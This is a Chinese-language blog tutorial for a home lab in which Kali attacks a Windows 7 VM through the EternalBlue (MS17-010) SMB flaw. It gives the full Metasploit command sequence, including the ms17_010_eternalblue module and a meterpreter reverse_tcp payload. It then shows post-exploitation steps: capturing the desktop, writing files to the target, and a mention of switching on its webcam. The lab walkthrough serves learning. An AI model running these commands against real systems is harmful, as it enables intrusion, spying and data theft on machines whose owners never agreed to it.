【EternalBlue】利用永恆之藍漏洞滲透攻擊教程


當初被永恆之藍吸引,是因為覺得這個名字還取得挺好聽的,有點神秘還有點浪漫色彩。關於永恆之藍的原理就不多解釋了哈,在這里主要演示一下如何利用永恆之藍進行滲透。

演示環境

虛擬機軟件:
名稱:VMware® Workstation 15 Pro
版本號:15.1.0 build-13591040
下載地址:https://my.vmware.com/cn/web/vmware/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/16_0
攻擊機:
名稱:Kali
版本號:kali-linux-2020.3-installer-amd64
下載地址:https://mirrors.aliyun.com/kali-images/kali-2020.3/
靶機:
名稱:Win7
版本號:cn_windows_7_enterprise_x64_dvd_x15-70741
密鑰:網絡上隨便一搜就有
下載地址:https://msdn.itellyou.cn/

實驗准備

靶機Win7

一、關閉防火牆
image.png
使用netsh firewall show state命令
檢查防火牆是否正確關閉
(操作模式為禁用)
image.png

二、獲取Win7的IP地址
使用ipconfig命令獲取IP地址
所以靶機的IP地址為:192.168.204.140
image.png

攻擊機Kali

一、獲取kali的IP地址(可省略)
為了能使用ifconfig命令,這里要先切換到root哦,切換命令sudo su
使用ifconfig命令查詢Kali的IP地址。
所以攻擊機的IP地址為:192.168.204.141
image.png

二、測試攻擊機和靶機之間的連通性
這里讓Kali使用ping命令
ping 192.168.204.140
(如果ping執行的時候卡住了,關掉窗口重來一次)
image.png

三、使用nmap掃描靶機
使用命令nmap 192.168.204.140
可以看到445端口是開放的
image.png

漏洞滲透

一、啟動msf
使用命令msfconsole
出現的圖案可能不一樣
image.png

二、搜索eternalblue
使用命令search eternalblue
image.png

三、選擇eternalblue
這里我們選擇第二個
使用命令**use exploit/windows/smb/ms17_010_eternalblue
注意命令手打的時候別打錯了啊
image.png

四、配置信息
1、先用show options命令熟悉一下
會顯示一些詳細信息
Required的yes表示必須有值
這里看到LHOST(攻擊機)和LPORT(監聽端口)都是有值的,此處要保證監聽端口(4444端口)是不被占用的狀態哦,或者也可以自行設置。
image.png
2、設置攻擊目標RHOSTS
使用命令set rhost 192.168.204.140
image.png
3、設置攻擊載荷payload
可以先使用show payloads命令查看有哪些payloads
image.png
使用命令set payload windows/x64/meterpreter/reverse_tcp
image.png

五、開始滲透吧!
使用run或者exploit命令滲透攻擊。
最下面顯示WIN表示滲透成功
如果顯示FAIL,可以重新再試試
image.png

功能測試

到這一步,我們就滲透成功啦,也就是獲取到了靶機的管理員權限。
接下來進行一些操作證實這一點。
一、獲取IP地址
使用命令ipconfig
可以看到確實是靶機Win7的IP地址。
image.png

二、截取靶機桌面
1、使用命令screenshot
image.png
2、查看保存到的截圖
出了點小小的意外,由於我是以普通用戶的身份進來的,所以沒有權限查看/root里面的文件內容。
接下來的操作是將截圖移動到/home/northwest/下面,方便我這個沒有root權限的普通用戶查看。
使用命令mv fUKNpRUJ.jpeg /home/northwest/
image.png
這樣圖片就到了/home/northwest/下面
image.png
正是從Win7捕獲到的屏幕截圖
image.png

二、寫文件到靶機
這里使用命令:
cd C:\Users\Lenovo\Desktop
mkdir eternalblue
edit I_am_kali.txt
這樣就在Win7的桌面創建了一個名為eternalblue的文件夾和一個名為I_am_kali的txt文件。
(並且在txt里寫下了一些內容,按i進入插入模式,寫完后,先按Esc,再按:wq退出並保存)
image.png
可以在Win7看到該文件夾和文件
image.png

這里僅僅進行幾個簡單的操作來驗證,總而言之,我們獲取到了靶機Win7的管理員權限,可以對它為所欲為。(說起來我當初開了攝像頭,然后就看到了一個頭發凌亂,穿着小熊睡衣,懷里還抱着一袋山葯脆片的我......當時差點就被寄幾丑到去世。)

原理沒有講解,步驟寫得也有點啰嗦。
有什么問題歡迎大家一起討論哦。
謝謝您的瀏覽!90度鞠躬!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM